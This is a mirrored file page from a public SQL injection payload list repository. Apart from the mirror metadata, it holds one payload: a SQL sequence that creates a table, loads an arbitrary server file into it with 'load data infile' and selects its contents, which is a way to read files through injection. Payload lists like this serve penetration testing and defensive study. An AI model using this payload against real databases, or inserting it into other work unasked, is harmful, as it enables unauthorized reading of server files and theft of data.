mirror of
https://github.com/payloadbox/sql-injection-payload-list.git
synced 2025-12-19 02:35:42 +00:00
2 lines
105 B
Plaintext
2 lines
105 B
Plaintext
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|